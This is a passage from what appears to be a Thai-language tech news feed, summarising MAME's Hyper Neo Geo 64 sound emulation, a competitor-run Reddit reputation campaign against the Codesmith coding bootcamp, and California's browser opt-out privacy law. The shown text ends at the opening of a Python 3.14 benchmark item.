• “MAME ปลดล็อก Hyper Neo Geo 64 หลังรอคอย 21 ปี — เสียงมาแล้ว เกมพร้อมเล่นจริง!”

    หลังจากใช้เวลากว่า 2 ทศวรรษในการพยายามแกะระบบ Hyper Neo Geo 64 ซึ่งเป็นเครื่องอาร์เคด 3D ที่ SNK เปิดตัวช่วงปี 1997–1999 ทีมพัฒนา MAME ก็สามารถทำให้ระบบนี้ “ทำงานได้จริง” พร้อมเสียงที่สมบูรณ์ในเวอร์ชันล่าสุด MAME 0.282 ที่จะเปิดตัวในเดือนตุลาคม 2025

    David “MameHaze” Haywood เริ่มต้นการพัฒนา Hyper Neo Geo 64 ตั้งแต่ปี 2004 โดยในตอนนั้น MAME ยังไม่รองรับระบบ 3D และไม่มีข้อมูล MCU หรือ CPU ที่ใช้ในระบบเลย แม้จะมีความพยายามหลายครั้ง แต่เสียงยังคงเป็นปัญหาใหญ่ จนกระทั่งในปี 2023 มีการ dump ข้อมูล I/O MCU ได้สำเร็จ และเริ่มมีความคืบหน้าอย่างจริงจัง

    เมื่อ Haywood ประกาศว่า Hyper Neo Geo 64 “ทำงานได้” แม้เสียงยังไม่สมบูรณ์ ก็กลายเป็นแรงผลักดันให้ทีมอื่นเข้ามาช่วยแก้ไข โดย R. Belmont, Happy และ Olivier Galibert ได้ร่วมกันปรับปรุงระบบเสียงอย่างต่อเนื่องในช่วงเดือนกันยายน–ตุลาคม โดยใช้ความรู้จากการพัฒนา synthesizer และการแกะโปรแกรมเสียงแบบละเอียด

    ผลลัพธ์คือเสียงของเกมอย่าง Samurai Shodown 64, Beast Busters: Second Nightmare และ Xtreme Rally ได้รับการปรับปรุงจนใกล้เคียงต้นฉบับมากขึ้น โดยเฉพาะ Xtreme Rally ที่เคยมีปัญหาเสียงหายและเสียงติดค้าง ก็ได้รับการแก้ไขให้สมบูรณ์ในเวอร์ชัน 0.282

    Hyper Neo Geo 64 มีเกมเพียง 7 เกมเท่านั้น แต่การที่ระบบนี้สามารถเล่นได้พร้อมเสียง ถือเป็นชัยชนะของวงการ emulation ที่ไม่ยอมแพ้แม้จะใช้เวลานานถึง 21 ปี

    ข้อมูลสำคัญจากข่าว
    MAME เวอร์ชัน 0.282 รองรับ Hyper Neo Geo 64 พร้อมเสียงสมบูรณ์
    David Haywood เริ่มพัฒนา Hyper Neo Geo 64 ตั้งแต่ปี 2004
    มีการ dump ข้อมูล I/O MCU สำเร็จในปี 2023
    ทีม Belmont, Happy และ Galibert ร่วมกันแก้ไขระบบเสียง
    ใช้เทคนิคจากการพัฒนา synthesizer เพื่อปรับปรุงเสียง
    เกมที่ได้รับการปรับปรุงเสียง ได้แก่ Samurai Shodown 64, Beast Busters และ Xtreme Rally
    ปัญหาเสียงหายและเสียงติดค้างใน Xtreme Rally ได้รับการแก้ไข
    Hyper Neo Geo 64 มีเกมเพียง 7 เกม แต่ถือเป็นระบบที่ซับซ้อนและท้าทายในการ emulate

    ข้อมูลเสริมจากภายนอก
    Hyper Neo Geo 64 เป็นระบบอาร์เคด 3D ที่ SNK พัฒนาเพื่อเปลี่ยนผ่านจากยุค 2D
    MAME เป็นโปรเจกต์โอเพ่นซอร์สที่มีเป้าหมายในการอนุรักษ์เกมอาร์เคดทุกระบบ
    การ emulate ระบบเสียงต้องเข้าใจการทำงานของ DSP และ CPU เฉพาะทาง
    การแกะโปรแกรมเสียงต้องใช้การ disassembly และการวิเคราะห์ waveform
    การพัฒนา MAME อาศัยความร่วมมือจากนักพัฒนาทั่วโลกที่ทำงานแบบสมัครใจ

    https://www.readonlymemo.com/mame-hyper-neo-geo-support-sound-emulation/
    🕹️ “MAME ปลดล็อก Hyper Neo Geo 64 หลังรอคอย 21 ปี — เสียงมาแล้ว เกมพร้อมเล่นจริง!” หลังจากใช้เวลากว่า 2 ทศวรรษในการพยายามแกะระบบ Hyper Neo Geo 64 ซึ่งเป็นเครื่องอาร์เคด 3D ที่ SNK เปิดตัวช่วงปี 1997–1999 ทีมพัฒนา MAME ก็สามารถทำให้ระบบนี้ “ทำงานได้จริง” พร้อมเสียงที่สมบูรณ์ในเวอร์ชันล่าสุด MAME 0.282 ที่จะเปิดตัวในเดือนตุลาคม 2025 David “MameHaze” Haywood เริ่มต้นการพัฒนา Hyper Neo Geo 64 ตั้งแต่ปี 2004 โดยในตอนนั้น MAME ยังไม่รองรับระบบ 3D และไม่มีข้อมูล MCU หรือ CPU ที่ใช้ในระบบเลย แม้จะมีความพยายามหลายครั้ง แต่เสียงยังคงเป็นปัญหาใหญ่ จนกระทั่งในปี 2023 มีการ dump ข้อมูล I/O MCU ได้สำเร็จ และเริ่มมีความคืบหน้าอย่างจริงจัง เมื่อ Haywood ประกาศว่า Hyper Neo Geo 64 “ทำงานได้” แม้เสียงยังไม่สมบูรณ์ ก็กลายเป็นแรงผลักดันให้ทีมอื่นเข้ามาช่วยแก้ไข โดย R. Belmont, Happy และ Olivier Galibert ได้ร่วมกันปรับปรุงระบบเสียงอย่างต่อเนื่องในช่วงเดือนกันยายน–ตุลาคม โดยใช้ความรู้จากการพัฒนา synthesizer และการแกะโปรแกรมเสียงแบบละเอียด ผลลัพธ์คือเสียงของเกมอย่าง Samurai Shodown 64, Beast Busters: Second Nightmare และ Xtreme Rally ได้รับการปรับปรุงจนใกล้เคียงต้นฉบับมากขึ้น โดยเฉพาะ Xtreme Rally ที่เคยมีปัญหาเสียงหายและเสียงติดค้าง ก็ได้รับการแก้ไขให้สมบูรณ์ในเวอร์ชัน 0.282 Hyper Neo Geo 64 มีเกมเพียง 7 เกมเท่านั้น แต่การที่ระบบนี้สามารถเล่นได้พร้อมเสียง ถือเป็นชัยชนะของวงการ emulation ที่ไม่ยอมแพ้แม้จะใช้เวลานานถึง 21 ปี ✅ ข้อมูลสำคัญจากข่าว ➡️ MAME เวอร์ชัน 0.282 รองรับ Hyper Neo Geo 64 พร้อมเสียงสมบูรณ์ ➡️ David Haywood เริ่มพัฒนา Hyper Neo Geo 64 ตั้งแต่ปี 2004 ➡️ มีการ dump ข้อมูล I/O MCU สำเร็จในปี 2023 ➡️ ทีม Belmont, Happy และ Galibert ร่วมกันแก้ไขระบบเสียง ➡️ ใช้เทคนิคจากการพัฒนา synthesizer เพื่อปรับปรุงเสียง ➡️ เกมที่ได้รับการปรับปรุงเสียง ได้แก่ Samurai Shodown 64, Beast Busters และ Xtreme Rally ➡️ ปัญหาเสียงหายและเสียงติดค้างใน Xtreme Rally ได้รับการแก้ไข ➡️ Hyper Neo Geo 64 มีเกมเพียง 7 เกม แต่ถือเป็นระบบที่ซับซ้อนและท้าทายในการ emulate ✅ ข้อมูลเสริมจากภายนอก ➡️ Hyper Neo Geo 64 เป็นระบบอาร์เคด 3D ที่ SNK พัฒนาเพื่อเปลี่ยนผ่านจากยุค 2D ➡️ MAME เป็นโปรเจกต์โอเพ่นซอร์สที่มีเป้าหมายในการอนุรักษ์เกมอาร์เคดทุกระบบ ➡️ การ emulate ระบบเสียงต้องเข้าใจการทำงานของ DSP และ CPU เฉพาะทาง ➡️ การแกะโปรแกรมเสียงต้องใช้การ disassembly และการวิเคราะห์ waveform ➡️ การพัฒนา MAME อาศัยความร่วมมือจากนักพัฒนาทั่วโลกที่ทำงานแบบสมัครใจ https://www.readonlymemo.com/mame-hyper-neo-geo-support-sound-emulation/
    WWW.READONLYMEMO.COM
    After 2 decades of tinkering, MAME finally cracks the Hyper Neo Geo 64
    How MAME devs finally got sound working for the 3D arcade system. Plus: PC Engine LaserActive support gets fast-tracked.
    0 Comments 0 Shares 1 Views 0 Reviews
  • “สงครามใต้ดินในวงการบูตแคมป์: เมื่อ Reddit กลายเป็นอาวุธทำลายชื่อเสียง Codesmith ด้วยมือของคู่แข่ง”

    เรื่องราวสุดดาร์กของ Codesmith บูตแคมป์สายซอฟต์แวร์ที่เคยรุ่งเรืองด้วยรายได้กว่า $23.5 ล้าน กลับถูกโจมตีอย่างต่อเนื่องผ่าน Reddit โดยผู้ก่อเหตุคือ Michael Novati — ผู้ร่วมก่อตั้ง Formation ซึ่งเป็นบูตแคมป์คู่แข่ง และยังเป็นผู้ดูแลหลักของ subreddit r/codingbootcamp

    Michael ใช้ตำแหน่ง moderator เป็นเครื่องมือในการบิดเบือนข้อมูล ลบโพสต์เชิงบวกของ Codesmith และปล่อยคอมเมนต์เชิงลบทุกวันตลอด 487 วัน รวมกว่า 425 โพสต์ โดยใช้เทคนิคการเปรียบเทียบกับลัทธิ NXIVM, กล่าวหาว่ามีการโกงข้อมูล CIRR, และแม้กระทั่งตามรอยลูกของพนักงานบน LinkedIn เพื่อกล่าวหาว่ามีการเล่นเส้น

    ผลกระทบไม่ใช่แค่ชื่อเสียง แต่รวมถึงรายได้ที่ลดลงกว่า 40% จากการโจมตีบน Reddit และอีก 40% จากภาวะตลาด ทำให้ Codesmithต้องปลดพนักงานหลายรอบ เหลือเพียง 15 คน และผู้ก่อตั้งต้องลาออกเพราะความเครียด

    แม้จะมีการตรวจสอบจากหลายฝ่าย รวมถึงผู้ร่วมก่อตั้งบูตแคมป์อื่น ๆ ที่ยืนยันว่า Codesmith เป็นหนึ่งในโปรแกรมที่ดีที่สุดในวงการ แต่การควบคุม narrative บน Reddit ทำให้ผู้สนใจเรียนรู้ไม่สามารถเข้าถึงข้อมูลที่เป็นกลางได้

    การโจมตีนี้ยังลามไปถึง Google และ LLM อย่าง ChatGPT ซึ่งดึงข้อมูลจาก Reddit ทำให้คำค้นหา “Codesmith ดีไหม” กลายเป็นคำตอบที่เต็มไปด้วยข้อกล่าวหาและความสงสัย


    ธุรกิจของ “coding bootcamp” คือการให้บริการฝึกอบรมเข้มข้นด้านการเขียนโปรแกรมและทักษะเทคโนโลยี เพื่อเตรียมผู้เรียนเข้าสู่สายงานไอที โดยเฉพาะตำแหน่งอย่าง software engineer, full-stack developer, data analyst ฯลฯ ภายในระยะเวลาไม่กี่เดือน

    โมเดลธุรกิจของ bootcamp
    หลักสูตรแบบเร่งรัด (Intensive Program) Bootcamp มักจัดหลักสูตร 8–16 สัปดาห์ ที่เน้นการเรียนรู้แบบลงมือทำจริง เช่น สร้างโปรเจกต์, pair programming, mock interview
    คัดเลือกผู้เรียนอย่างเข้มงวด หลายแห่ง เช่น Codesmith หรือ AppAcademy จะคัดเลือกผู้เรียนที่มีพื้นฐานหรือความมุ่งมั่นสูง เพื่อให้ผลลัพธ์หลังเรียนดีขึ้น
    รายได้หลักมาจากค่าเรียน ค่าเรียนมักอยู่ระหว่าง $10,000–$20,000 ต่อคน โดยบางแห่งมีระบบ “Income Share Agreement” (ISA) ที่ให้เรียนฟรีก่อน แล้วจ่ายเมื่อได้งาน
    บริการเสริมหลังเรียน เช่น การช่วยเขียน resume, mock interview, career coaching ซึ่งช่วยเพิ่มโอกาสได้งานและสร้างชื่อเสียงให้ bootcamp
    ความร่วมมือกับบริษัทเทคโนโลยี บาง bootcamp มีดีลกับบริษัทเพื่อส่งนักเรียนไปฝึกงานหรือสมัครงานโดยตรง ซึ่งช่วยเพิ่มความน่าเชื่อถือและผลลัพธ์

    จุดที่สร้างกำไร
    ค่าเรียนต่อหัวสูง เมื่อ bootcamp มีชื่อเสียงและผลลัพธ์ดี ก็สามารถตั้งราคาสูงได้ เช่น Codesmith เคยมีรายได้ $23.5M จากนักเรียนไม่กี่พันคน
    ต้นทุนคงที่ต่ำ แม้จะมีค่าใช้จ่ายด้านครูและระบบ แต่เมื่อหลักสูตรถูกออกแบบแล้ว สามารถใช้ซ้ำได้หลายรุ่นโดยไม่ต้องลงทุนเพิ่มมาก
    การขยายแบบออนไลน์ หลาย bootcamp เปลี่ยนจาก onsite เป็น remote ทำให้ลดค่าเช่าสถานที่ และขยายตลาดได้ทั่วโลก
    การใช้ alumni เป็น brand ambassador ผู้เรียนที่ได้งานดีจะช่วยสร้างชื่อเสียงให้ bootcamp โดยไม่ต้องจ่ายค่าโฆษณาโดยตรง


    ข้อมูลเสริมจากภายนอก
    Reddit เป็นแหล่งข้อมูลหลักของ LLM และปรากฏในผลการค้นหาของ Google
    CIRR เป็นองค์กรกลางที่เก็บข้อมูลผลลัพธ์ของบูตแคมป์อย่างเป็นกลาง
    การควบคุม subreddit ทำให้สามารถลบโพสต์, ปักหมุด, และแบนผู้ใช้ได้ตามใจ
    Formation เคยระดมทุน $4M จาก Andreessen Horowitz
    ผู้ร่วมก่อตั้งบูตแคมป์อื่น เช่น Tech Elevator และ AppAcademy ยืนยันว่า Codesmith มีคุณภาพสูง

    คำเตือนและข้อจำกัด
    การควบคุม subreddit โดยคู่แข่งสร้างความเสียหายร้ายแรงต่อธุรกิจ
    ผู้ใช้ทั่วไปไม่รู้ว่า moderator มีผลประโยชน์ทับซ้อน
    LLM และ Google ดึงข้อมูลจาก Reddit โดยไม่ตรวจสอบความเป็นกลาง
    การโจมตีแบบนี้สามารถเกิดขึ้นกับธุรกิจใดก็ได้ที่มี subreddit อุตสาหกรรม
    ไม่มีระบบตรวจสอบหรือถ่วงดุลอำนาจของ moderator บน Reddit

    https://larslofgren.com/codesmith-reddit-reputation-attack/
    🔥 “สงครามใต้ดินในวงการบูตแคมป์: เมื่อ Reddit กลายเป็นอาวุธทำลายชื่อเสียง Codesmith ด้วยมือของคู่แข่ง” เรื่องราวสุดดาร์กของ Codesmith บูตแคมป์สายซอฟต์แวร์ที่เคยรุ่งเรืองด้วยรายได้กว่า $23.5 ล้าน กลับถูกโจมตีอย่างต่อเนื่องผ่าน Reddit โดยผู้ก่อเหตุคือ Michael Novati — ผู้ร่วมก่อตั้ง Formation ซึ่งเป็นบูตแคมป์คู่แข่ง และยังเป็นผู้ดูแลหลักของ subreddit r/codingbootcamp Michael ใช้ตำแหน่ง moderator เป็นเครื่องมือในการบิดเบือนข้อมูล ลบโพสต์เชิงบวกของ Codesmith และปล่อยคอมเมนต์เชิงลบทุกวันตลอด 487 วัน รวมกว่า 425 โพสต์ โดยใช้เทคนิคการเปรียบเทียบกับลัทธิ NXIVM, กล่าวหาว่ามีการโกงข้อมูล CIRR, และแม้กระทั่งตามรอยลูกของพนักงานบน LinkedIn เพื่อกล่าวหาว่ามีการเล่นเส้น ผลกระทบไม่ใช่แค่ชื่อเสียง แต่รวมถึงรายได้ที่ลดลงกว่า 40% จากการโจมตีบน Reddit และอีก 40% จากภาวะตลาด ทำให้ Codesmithต้องปลดพนักงานหลายรอบ เหลือเพียง 15 คน และผู้ก่อตั้งต้องลาออกเพราะความเครียด แม้จะมีการตรวจสอบจากหลายฝ่าย รวมถึงผู้ร่วมก่อตั้งบูตแคมป์อื่น ๆ ที่ยืนยันว่า Codesmith เป็นหนึ่งในโปรแกรมที่ดีที่สุดในวงการ แต่การควบคุม narrative บน Reddit ทำให้ผู้สนใจเรียนรู้ไม่สามารถเข้าถึงข้อมูลที่เป็นกลางได้ การโจมตีนี้ยังลามไปถึง Google และ LLM อย่าง ChatGPT ซึ่งดึงข้อมูลจาก Reddit ทำให้คำค้นหา “Codesmith ดีไหม” กลายเป็นคำตอบที่เต็มไปด้วยข้อกล่าวหาและความสงสัย 🔖🔖 ธุรกิจของ “coding bootcamp” คือการให้บริการฝึกอบรมเข้มข้นด้านการเขียนโปรแกรมและทักษะเทคโนโลยี เพื่อเตรียมผู้เรียนเข้าสู่สายงานไอที โดยเฉพาะตำแหน่งอย่าง software engineer, full-stack developer, data analyst ฯลฯ ภายในระยะเวลาไม่กี่เดือน ✅ โมเดลธุรกิจของ bootcamp ➡️ หลักสูตรแบบเร่งรัด (Intensive Program) Bootcamp มักจัดหลักสูตร 8–16 สัปดาห์ ที่เน้นการเรียนรู้แบบลงมือทำจริง เช่น สร้างโปรเจกต์, pair programming, mock interview ➡️ คัดเลือกผู้เรียนอย่างเข้มงวด หลายแห่ง เช่น Codesmith หรือ AppAcademy จะคัดเลือกผู้เรียนที่มีพื้นฐานหรือความมุ่งมั่นสูง เพื่อให้ผลลัพธ์หลังเรียนดีขึ้น ➡️ รายได้หลักมาจากค่าเรียน ค่าเรียนมักอยู่ระหว่าง $10,000–$20,000 ต่อคน โดยบางแห่งมีระบบ “Income Share Agreement” (ISA) ที่ให้เรียนฟรีก่อน แล้วจ่ายเมื่อได้งาน ➡️ บริการเสริมหลังเรียน เช่น การช่วยเขียน resume, mock interview, career coaching ซึ่งช่วยเพิ่มโอกาสได้งานและสร้างชื่อเสียงให้ bootcamp ➡️ ความร่วมมือกับบริษัทเทคโนโลยี บาง bootcamp มีดีลกับบริษัทเพื่อส่งนักเรียนไปฝึกงานหรือสมัครงานโดยตรง ซึ่งช่วยเพิ่มความน่าเชื่อถือและผลลัพธ์ ✅ จุดที่สร้างกำไร ➡️ ค่าเรียนต่อหัวสูง เมื่อ bootcamp มีชื่อเสียงและผลลัพธ์ดี ก็สามารถตั้งราคาสูงได้ เช่น Codesmith เคยมีรายได้ $23.5M จากนักเรียนไม่กี่พันคน ➡️ ต้นทุนคงที่ต่ำ แม้จะมีค่าใช้จ่ายด้านครูและระบบ แต่เมื่อหลักสูตรถูกออกแบบแล้ว สามารถใช้ซ้ำได้หลายรุ่นโดยไม่ต้องลงทุนเพิ่มมาก ➡️ การขยายแบบออนไลน์ หลาย bootcamp เปลี่ยนจาก onsite เป็น remote ทำให้ลดค่าเช่าสถานที่ และขยายตลาดได้ทั่วโลก ➡️ การใช้ alumni เป็น brand ambassador ผู้เรียนที่ได้งานดีจะช่วยสร้างชื่อเสียงให้ bootcamp โดยไม่ต้องจ่ายค่าโฆษณาโดยตรง 🔖🔖🔖 ✅ ข้อมูลเสริมจากภายนอก ➡️ Reddit เป็นแหล่งข้อมูลหลักของ LLM และปรากฏในผลการค้นหาของ Google ➡️ CIRR เป็นองค์กรกลางที่เก็บข้อมูลผลลัพธ์ของบูตแคมป์อย่างเป็นกลาง ➡️ การควบคุม subreddit ทำให้สามารถลบโพสต์, ปักหมุด, และแบนผู้ใช้ได้ตามใจ ➡️ Formation เคยระดมทุน $4M จาก Andreessen Horowitz ➡️ ผู้ร่วมก่อตั้งบูตแคมป์อื่น เช่น Tech Elevator และ AppAcademy ยืนยันว่า Codesmith มีคุณภาพสูง ‼️ คำเตือนและข้อจำกัด ⛔ การควบคุม subreddit โดยคู่แข่งสร้างความเสียหายร้ายแรงต่อธุรกิจ ⛔ ผู้ใช้ทั่วไปไม่รู้ว่า moderator มีผลประโยชน์ทับซ้อน ⛔ LLM และ Google ดึงข้อมูลจาก Reddit โดยไม่ตรวจสอบความเป็นกลาง ⛔ การโจมตีแบบนี้สามารถเกิดขึ้นกับธุรกิจใดก็ได้ที่มี subreddit อุตสาหกรรม ⛔ ไม่มีระบบตรวจสอบหรือถ่วงดุลอำนาจของ moderator บน Reddit https://larslofgren.com/codesmith-reddit-reputation-attack/
    LARSLOFGREN.COM
    The Story of Codesmith: How a Competitor Crippled a $23.5M Bootcamp By Becoming a Reddit Moderator
    Let’s say you decide to start a coding bootcamp. Your background is in pedagogy and you love teaching. Your parents were teachers. You find a co-founder, raise a bit of money, and pour your soul into your company. The first couple of years, students love your program. Positive feedback, extraordinary student outcomes, employees love the mission. You are quite literally […]
    0 Comments 0 Shares 2 Views 0 Reviews
  • “แคลิฟอร์เนียออกกฎหมายใหม่ ให้ผู้ใช้กดปุ่มเดียว ‘Opt-Out’ จากการขายข้อมูล — เว็บเบราว์เซอร์ต้องปรับตัวก่อนปี 2027”

    เมื่อวันที่ 9 ตุลาคม 2025 ผู้ว่าการรัฐแคลิฟอร์เนีย Gavin Newsom ได้ลงนามในกฎหมายใหม่ชื่อว่า “California Opt Me Out Act” ซึ่งเป็นการปรับปรุงจากกฎหมาย California Consumer Privacy Act (CCPA) ที่มีมาตั้งแต่ปี 2018 โดยเน้นให้ผู้บริโภคสามารถ “ยกเลิกการอนุญาตให้เว็บไซต์ขายหรือแชร์ข้อมูลส่วนตัว” ได้ง่ายขึ้นผ่านเว็บเบราว์เซอร์โดยตรง

    ก่อนหน้านี้ ผู้ใช้ต้องกดยืนยันการ opt-out ทีละเว็บไซต์ หรือใช้เบราว์เซอร์เฉพาะที่รองรับฟีเจอร์นี้ เช่น Brave หรือใช้ส่วนขยาย (extension) เพิ่มเติม แต่กฎหมายใหม่จะบังคับให้เบราว์เซอร์ทุกตัวที่ใช้งานในแคลิฟอร์เนียต้องมีปุ่ม opt-out ที่หาเจอง่าย และส่งสัญญาณ opt-out preference signal (OOPS) ไปยังเว็บไซต์โดยอัตโนมัติ

    เมื่อเปิดใช้งาน OOPS แล้ว เว็บไซต์จะต้องหยุดการขายหรือแชร์ข้อมูล เช่น ประวัติการเข้าชม, ตำแหน่ง, ความสนใจ และพฤติกรรมการซื้อของผู้ใช้ โดยไม่ต้องให้ผู้ใช้ยืนยันซ้ำในแต่ละเว็บไซต์

    กฎหมายนี้จะมีผลบังคับใช้ในวันที่ 1 มกราคม 2027 และถือเป็นกฎหมายแรกในสหรัฐฯ ที่บังคับให้เบราว์เซอร์ต้องรองรับการ opt-out แบบ universal ซึ่งนักวิเคราะห์เชื่อว่าจะส่งผลกระทบต่ออุตสาหกรรมโฆษณาออนไลน์อย่างมาก

    นอกจากนี้ยังมีอีกสองกฎหมายที่ลงนามพร้อมกัน ได้แก่

    กฎหมายที่บังคับให้แพลตฟอร์มโซเชียลมีเดียต้องให้ผู้ใช้ยกเลิกบัญชีได้ง่าย และลบข้อมูลทั้งหมดทันที
    กฎหมายที่ปรับปรุงระบบลงทะเบียน data broker โดยให้ผู้ใช้รู้ว่าใครเก็บข้อมูลของตน และนำไปใช้อย่างไร

    ข้อมูลสำคัญจากข่าว
    แคลิฟอร์เนียออกกฎหมาย “Opt Me Out Act” เพื่อให้ผู้ใช้ opt-out ได้ง่ายผ่านเบราว์เซอร์
    กฎหมายบังคับให้เบราว์เซอร์ต้องมีปุ่ม opt-out ที่หาเจอง่ายและส่งสัญญาณ OOPS
    เมื่อเปิดใช้งาน OOPS เว็บไซต์ต้องหยุดขายหรือแชร์ข้อมูลทันที
    กฎหมายมีผลบังคับใช้วันที่ 1 มกราคม 2027
    เป็นกฎหมายแรกในสหรัฐฯ ที่บังคับให้เบราว์เซอร์รองรับ opt-out แบบ universal
    ผู้ใช้ไม่ต้องติดตั้ง extension หรือใช้เบราว์เซอร์เฉพาะอีกต่อไป
    อีกสองกฎหมายที่ลงนามพร้อมกันเกี่ยวกับการลบบัญชีโซเชียลและการเปิดเผยข้อมูลจาก data broker

    ข้อมูลเสริมจากภายนอก
    OOPS (Opt-Out Preference Signal) เป็นมาตรฐานที่กำหนดโดย CCPA และ CPPA
    Brave และ Firefox เป็นเบราว์เซอร์ที่รองรับ OOPS มานานแล้ว
    Data broker คือบริษัทที่รวบรวมข้อมูลจากหลายแหล่งเพื่อขายให้กับนักโฆษณา
    การ opt-out แบบ universal ช่วยลดความยุ่งยากในการปกป้องข้อมูลส่วนตัว
    กฎหมายนี้อาจกระทบต่อรายได้ของเว็บไซต์ที่พึ่งพาโฆษณาแบบ personalized

    คำเตือนและข้อจำกัด
    กฎหมายมีผลปี 2027 ผู้ใช้ยังต้องใช้ extension หรือเบราว์เซอร์เฉพาะจนกว่าจะถึงวันนั้น
    เบราว์เซอร์ที่ไม่ปรับตัวอาจถูกห้ามใช้งานในแคลิฟอร์เนีย
    เว็บไซต์ที่ไม่รองรับ OOPS อาจละเมิดกฎหมายและถูกลงโทษ
    ผู้ใช้บางรายอาจไม่รู้ว่าต้องเปิดใช้งาน OOPS ด้วยตนเอง
    การ opt-out อาจทำให้เว็บไซต์บางแห่งแสดงเนื้อหาหรือโฆษณาไม่ตรงความสนใจ

    https://therecord.media/california-signs-law-opt-out-browsers
    🛑 “แคลิฟอร์เนียออกกฎหมายใหม่ ให้ผู้ใช้กดปุ่มเดียว ‘Opt-Out’ จากการขายข้อมูล — เว็บเบราว์เซอร์ต้องปรับตัวก่อนปี 2027” เมื่อวันที่ 9 ตุลาคม 2025 ผู้ว่าการรัฐแคลิฟอร์เนีย Gavin Newsom ได้ลงนามในกฎหมายใหม่ชื่อว่า “California Opt Me Out Act” ซึ่งเป็นการปรับปรุงจากกฎหมาย California Consumer Privacy Act (CCPA) ที่มีมาตั้งแต่ปี 2018 โดยเน้นให้ผู้บริโภคสามารถ “ยกเลิกการอนุญาตให้เว็บไซต์ขายหรือแชร์ข้อมูลส่วนตัว” ได้ง่ายขึ้นผ่านเว็บเบราว์เซอร์โดยตรง ก่อนหน้านี้ ผู้ใช้ต้องกดยืนยันการ opt-out ทีละเว็บไซต์ หรือใช้เบราว์เซอร์เฉพาะที่รองรับฟีเจอร์นี้ เช่น Brave หรือใช้ส่วนขยาย (extension) เพิ่มเติม แต่กฎหมายใหม่จะบังคับให้เบราว์เซอร์ทุกตัวที่ใช้งานในแคลิฟอร์เนียต้องมีปุ่ม opt-out ที่หาเจอง่าย และส่งสัญญาณ opt-out preference signal (OOPS) ไปยังเว็บไซต์โดยอัตโนมัติ เมื่อเปิดใช้งาน OOPS แล้ว เว็บไซต์จะต้องหยุดการขายหรือแชร์ข้อมูล เช่น ประวัติการเข้าชม, ตำแหน่ง, ความสนใจ และพฤติกรรมการซื้อของผู้ใช้ โดยไม่ต้องให้ผู้ใช้ยืนยันซ้ำในแต่ละเว็บไซต์ กฎหมายนี้จะมีผลบังคับใช้ในวันที่ 1 มกราคม 2027 และถือเป็นกฎหมายแรกในสหรัฐฯ ที่บังคับให้เบราว์เซอร์ต้องรองรับการ opt-out แบบ universal ซึ่งนักวิเคราะห์เชื่อว่าจะส่งผลกระทบต่ออุตสาหกรรมโฆษณาออนไลน์อย่างมาก นอกจากนี้ยังมีอีกสองกฎหมายที่ลงนามพร้อมกัน ได้แก่ 🔰 กฎหมายที่บังคับให้แพลตฟอร์มโซเชียลมีเดียต้องให้ผู้ใช้ยกเลิกบัญชีได้ง่าย และลบข้อมูลทั้งหมดทันที 🔰 กฎหมายที่ปรับปรุงระบบลงทะเบียน data broker โดยให้ผู้ใช้รู้ว่าใครเก็บข้อมูลของตน และนำไปใช้อย่างไร ✅ ข้อมูลสำคัญจากข่าว ➡️ แคลิฟอร์เนียออกกฎหมาย “Opt Me Out Act” เพื่อให้ผู้ใช้ opt-out ได้ง่ายผ่านเบราว์เซอร์ ➡️ กฎหมายบังคับให้เบราว์เซอร์ต้องมีปุ่ม opt-out ที่หาเจอง่ายและส่งสัญญาณ OOPS ➡️ เมื่อเปิดใช้งาน OOPS เว็บไซต์ต้องหยุดขายหรือแชร์ข้อมูลทันที ➡️ กฎหมายมีผลบังคับใช้วันที่ 1 มกราคม 2027 ➡️ เป็นกฎหมายแรกในสหรัฐฯ ที่บังคับให้เบราว์เซอร์รองรับ opt-out แบบ universal ➡️ ผู้ใช้ไม่ต้องติดตั้ง extension หรือใช้เบราว์เซอร์เฉพาะอีกต่อไป ➡️ อีกสองกฎหมายที่ลงนามพร้อมกันเกี่ยวกับการลบบัญชีโซเชียลและการเปิดเผยข้อมูลจาก data broker ✅ ข้อมูลเสริมจากภายนอก ➡️ OOPS (Opt-Out Preference Signal) เป็นมาตรฐานที่กำหนดโดย CCPA และ CPPA ➡️ Brave และ Firefox เป็นเบราว์เซอร์ที่รองรับ OOPS มานานแล้ว ➡️ Data broker คือบริษัทที่รวบรวมข้อมูลจากหลายแหล่งเพื่อขายให้กับนักโฆษณา ➡️ การ opt-out แบบ universal ช่วยลดความยุ่งยากในการปกป้องข้อมูลส่วนตัว ➡️ กฎหมายนี้อาจกระทบต่อรายได้ของเว็บไซต์ที่พึ่งพาโฆษณาแบบ personalized ‼️ คำเตือนและข้อจำกัด ⛔ กฎหมายมีผลปี 2027 ผู้ใช้ยังต้องใช้ extension หรือเบราว์เซอร์เฉพาะจนกว่าจะถึงวันนั้น ⛔ เบราว์เซอร์ที่ไม่ปรับตัวอาจถูกห้ามใช้งานในแคลิฟอร์เนีย ⛔ เว็บไซต์ที่ไม่รองรับ OOPS อาจละเมิดกฎหมายและถูกลงโทษ ⛔ ผู้ใช้บางรายอาจไม่รู้ว่าต้องเปิดใช้งาน OOPS ด้วยตนเอง ⛔ การ opt-out อาจทำให้เว็บไซต์บางแห่งแสดงเนื้อหาหรือโฆษณาไม่ตรงความสนใจ https://therecord.media/california-signs-law-opt-out-browsers
    THERECORD.MEDIA
    California enacts law giving consumers ability to universally opt out of data sharing
    The California Consumer Privacy Act, signed in 2018, gave Californians the right to send opt-out signals, but major browsers have not had to make opt-outs simple to use.
    0 Comments 0 Shares 1 Views 0 Reviews
  • “Python 3.14 มาแล้ว! เร็วขึ้นกว่าเดิม แต่ JIT ยังไม่เปรี้ยง — Free-threading คือดาวเด่นของเวอร์ชันนี้”

    หลังจากเปิดตัวอย่างเป็นทางการในวันที่ 7 ตุลาคม 2025 Python 3.14 ได้รับการทดสอบประสิทธิภาพโดยนักพัฒนา Miguel Grinberg ซึ่งเปรียบเทียบกับเวอร์ชันก่อนหน้าและภาษาคู่แข่งอย่าง Node.js, Rust และ Pypy โดยใช้สคริปต์ทดสอบสองแบบคือ Fibonacci (เน้น recursion) และ Bubble Sort (เน้น iteration)

    ผลลัพธ์ชี้ว่า Python 3.14 เร็วกว่า Python 3.13 ประมาณ 27% ในการคำนวณ Fibonacci และเร็วกว่าเวอร์ชัน 3.11 ถึง 45% โดย Bubble Sort ก็เร็วขึ้นเช่นกัน แม้จะไม่มากเท่า Fibonacci

